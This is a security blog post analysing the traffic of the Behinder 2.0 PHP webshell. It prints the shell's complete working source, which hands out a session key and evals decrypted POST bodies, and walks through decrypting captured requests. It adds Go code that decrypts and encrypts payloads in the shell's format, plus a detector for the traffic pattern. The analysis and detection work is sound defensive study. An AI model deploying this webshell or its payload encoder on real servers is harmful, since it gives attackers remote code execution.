Behinder 2.0 Traffic Analysis (PHP)
Behinder (冰蝎) is a mainstream webshell management tool. This post analyzes the traffic of the PHP shell shipped with Behinder 2.0.
Github:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v2.0
Test environment:
1. Win7
2. PhpStudy
3. Behinder 2.0
To make testing easier, enable PHP's openssl extension.
Behinder ships its webshells in the server directory.
The content of shell.php is as follows:

```php
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    // Key handout: the last 16 hex characters of an MD5 digest, stored in
    // the session and printed as the entire response body
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        // Fallback without openssl: base64-decode, then XOR byte i with $key[($i+1)&15]
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        // With openssl: base64-decode, then AES-128-CBC with the 16-character key and no IV
        $post=openssl_decrypt($post, "AES128", $key);
    }
    // The plaintext is "func|params"; only params reaches eval()
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>
```
The code shows two decryption paths. When openssl is loaded, openssl_decrypt() with the cipher name "AES128" first base64-decodes the body and then decrypts it with AES-128-CBC, using the 16-character key string itself as the key; no IV is passed, so PHP pads the empty IV with zero bytes (the warning is silenced by @error_reporting(0)). Without openssl, the body is base64-decoded and byte i is XORed with $key[($i+1)&15] (+ binds tighter than & in PHP). In both cases the result is split on '|' and the second field is handed to eval().
Place /server/shell.php in the PhpStudy web root and connect to it with Behinder 2.0; the default password is pass (it is the name of the GET parameter that triggers the key handout).
Connection succeeded.
Traffic decryption
For clarity, I proxied the traffic through Burp for analysis.
Reopening the webshell, the following packets appear in Burp.
Behinder first fetches the key and then refreshes it: the first two packets are GET requests carrying the pass parameter, each answered with a fresh key, and the second one is the key that stays in the session, here 7e42737bc70ea538. The third packet settles the value of the content parameter, and the fourth fetches phpinfo-type information (these steps are easier to follow after reading the decryption method below).
Once the key is known, the traffic can be decrypted, since Behinder 2.0 transports everything under AES.
AES decryption: http://tools.bugscaner.com/cryptoaes/
Base64 decoding: https://tool.oschina.net/encrypt?type=3
Here the current user is queried through Behinder's cmd function.
The POST request data is as follows:
Decrypt it with the key obtained earlier:
After AES decryption, base64-decoding the string inside base64_decode(...) recovers the PHP code of the request, which starts with:
@error_reporting(0);
The last few lines show the system command being executed.
In the same way, decrypting the response (base64, then AES) shows the returned result.
Raw response data:
By the same method, the code behind Behinder's other functions can be analyzed.
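To make the two decryption branches of shell.php and the request-decoding steps above concrete, here is a Go decoder written for this post (an added example, not code from the Behinder project). It implements both branches of shell.php, plus the client side of the AES branch so the round trip can be checked offline, then performs the explode('|') and base64_decode(...) steps. Assumptions: AES-128-CBC with a zero IV and PKCS#7 padding is what openssl_decrypt("AES128") without an IV amounts to, as explained above; the sample payload, the `assert` first field and the eval(base64_decode("...")) wrapper are constructed from the post's description, not taken from captured traffic.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// shell.php hands out substr(md5(...),16): 16 lowercase hex characters used
// verbatim as the 16-byte AES-128 key. openssl_decrypt() is called with no IV,
// so PHP pads the empty IV with \0 (the warning is hidden by @error_reporting(0)).
var zeroIV = make([]byte, aes.BlockSize)

// EncryptAES is what the client sends when openssl is available:
// PKCS#7 pad -> AES-128-CBC (zero IV) -> base64.
func EncryptAES(key, plaintext string) (string, error) {
	block, err := aes.NewCipher([]byte(key)) // rejects keys that are not 16/24/32 bytes
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, zeroIV).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptAES is the openssl branch of shell.php: base64 -> AES-128-CBC (zero
// IV) -> strip PKCS#7 padding. Bodies that are not whole blocks are refused.
func DecryptAES(key, body string) (string, error) {
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(body))
	if err != nil {
		return "", err
	}
	if len(raw) == 0 || len(raw)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of 16-byte blocks")
	}
	out := make([]byte, len(raw))
	cipher.NewCBCDecrypter(block, zeroIV).CryptBlocks(out, raw)
	n := int(out[len(out)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(out[len(out)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding (wrong key?)")
	}
	return string(out[:len(out)-n]), nil
}

// XORCode is the no-openssl branch applied after base64 decoding: byte i XOR
// key[(i+1)&15], i.e. PHP's $key[$i+1&15]. XOR is its own inverse, so the
// client encodes with the same loop and base64s the result. key must be 16 bytes.
func XORCode(key string, data []byte) []byte {
	out := make([]byte, len(data))
	for i, c := range data {
		out[i] = c ^ key[(i+1)&15]
	}
	return out
}

// SplitPayload is explode('|'): shell.php parses the first field but only
// ever evals the second.
func SplitPayload(plain string) (fn, params string) {
	parts := append(strings.SplitN(plain, "|", 2), "")
	return parts[0], parts[1]
}

var b64Call = regexp.MustCompile(`base64_decode\(["']([A-Za-z0-9+/=]+)["']\)`)

// InnerPHP is the post's second decoding step: take the base64 inside
// base64_decode("...") in the params and decode it to the real PHP code.
func InnerPHP(params string) (string, bool) {
	m := b64Call.FindStringSubmatch(params)
	if m == nil {
		return "", false
	}
	code, err := base64.StdEncoding.DecodeString(m[1])
	return string(code), err == nil
}

func main() {
	key := "7e42737bc70ea538" // the key from the second ?pass response above
	// Constructed payload in the shape the post describes; "assert" as the
	// first field is a placeholder, the page does not show the real value.
	inner := "@error_reporting(0);\necho shell_exec(\"whoami\");"
	b64 := base64.StdEncoding.EncodeToString([]byte(inner))
	body, _ := EncryptAES(key, `assert|eval(base64_decode("`+b64+`"));`)
	plain, _ := DecryptAES(key, body)
	_, params := SplitPayload(plain)
	code, _ := InnerPHP(params)
	fmt.Printf("POST body: %s\nrecovered PHP:\n%s\n", body, code)
}
```

To use it on a real capture, pass DecryptAES the key from the second ?pass response and the raw POST body copied from Burp. A padding error usually means the body was encrypted under a different key than the one you took, for example the one from the first rather than the second handout, since every ?pass request replaces the session key.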
Traffic characteristics
1. A 16-character key: the response to the key request is nothing but 16 lowercase hex characters (the second half of an MD5 digest), and that value is then the AES key for the rest of the session.
2. A GET request with a pass parameter, followed by POSTs whose body is an opaque base64 string rather than form fields; the requests are tied together by the PHP session cookie that session_start() creates.
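As an added example (not part of the original post), here is a small detector that turns the two characteristics above into a rule run over a sequence of request/response pairs. It derives its checks from shell.php itself: the key handout is a GET with a pass parameter answered by a bare 16-hex-character body, and every later command is a POST whose body is valid base64 of a whole number of 16-byte blocks, because openssl_decrypt() consumes base64 and CBC ciphertext is block-aligned. The Exchange record layout and the sample exchanges are constructed for this example; the keys and bodies in them are made up (the first key is the one quoted in the post).

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Exchange is one request/response pair as pulled from a proxy or access log.
// The field layout is this example's own, not a real log format.
type Exchange struct {
	Method, Path, Query, ReqBody, RespBody string
}

// Finding records what was matched and the key in force at that point.
type Finding struct {
	Index int    // position in the input
	Kind  string // "key-handout" or "command"
	Key   string
}

var hexKey16 = regexp.MustCompile(`^[0-9a-f]{16}$`)

// IsKeyHandout: a GET carrying a "pass" query parameter whose response body is
// nothing but 16 lowercase hex characters, i.e. print substr(md5(...),16).
func IsKeyHandout(ex Exchange) bool {
	if ex.Method != "GET" {
		return false
	}
	q, err := url.ParseQuery(ex.Query)
	if err != nil {
		return false
	}
	_, hasPass := q["pass"]
	return hasPass && hexKey16.MatchString(strings.TrimSpace(ex.RespBody))
}

// IsAESShapedBody: openssl_decrypt() consumes base64 text and CBC ciphertext is
// a whole number of 16-byte blocks, so a raw POST body that is valid base64 of
// 16n bytes (no form fields, no JSON) is the shape of every later command.
func IsAESShapedBody(body string) bool {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(body))
	return err == nil && len(raw) > 0 && len(raw)%16 == 0
}

// Scan walks the exchanges in order, remembers the latest key handed out per
// path (the client fetches it twice; the later one is the live key) and flags
// POSTs to that path whose body has the AES shape.
func Scan(exs []Exchange) []Finding {
	keyFor := map[string]string{}
	var out []Finding
	for i, ex := range exs {
		switch {
		case IsKeyHandout(ex):
			keyFor[ex.Path] = strings.TrimSpace(ex.RespBody)
			out = append(out, Finding{i, "key-handout", keyFor[ex.Path]})
		case ex.Method == "POST" && keyFor[ex.Path] != "" && IsAESShapedBody(ex.ReqBody):
			out = append(out, Finding{i, "command", keyFor[ex.Path]})
		}
	}
	return out
}

// SampleExchanges is a constructed sequence modelled on the Burp capture in the
// post: two key fetches (the second key wins), one encrypted command, and two
// unrelated requests that must not fire. Keys and bodies are made up.
func SampleExchanges() []Exchange {
	opaque := base64.StdEncoding.EncodeToString(make([]byte, 32)) // two blocks; content irrelevant
	return []Exchange{
		{"GET", "/shell.php", "pass=1", "", "7e42737bc70ea538"},
		{"GET", "/shell.php", "pass=1", "", "0c5a9f3e71d2b864"},
		{"POST", "/shell.php", "", opaque, "..."},
		{"POST", "/login.php", "", "user=admin&pw=secret", "<html>"},
		{"GET", "/index.php", "page=1", "", "<html>"},
	}
}

func main() {
	for _, f := range Scan(SampleExchanges()) {
		fmt.Printf("#%d %-12s key=%s\n", f.Index, f.Kind, f.Key)
	}
}
```

Two caveats. The parameter name pass is the Behinder "password" and can be changed by editing shell.php, so the handout rule only catches the default. And a block-aligned base64 body on its own is a weak signal with plenty of benign matches, which is why Scan only reports a command after a handout on the same path; the way to confirm a hit is to decrypt the body with the captured key.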
Please credit the source when reposting. Readers are welcome to verify the references cited in this article and to point out any errors or unclear wording, either in the comments below or by email to sher10cksec@foxmail.com
Article title: Behinder 2.0 Traffic Analysis (PHP)
Author: sher10ck
Published: 2021-06-23, 10:02:45
Last updated: 2021-06-23, 16:35:00
Original link: http://sherlocz.github.io/2021/06/23/behinder2-analysis/
License: "Attribution-NonCommercial-ShareAlike 4.0". Keep the original link and author attribution when reposting.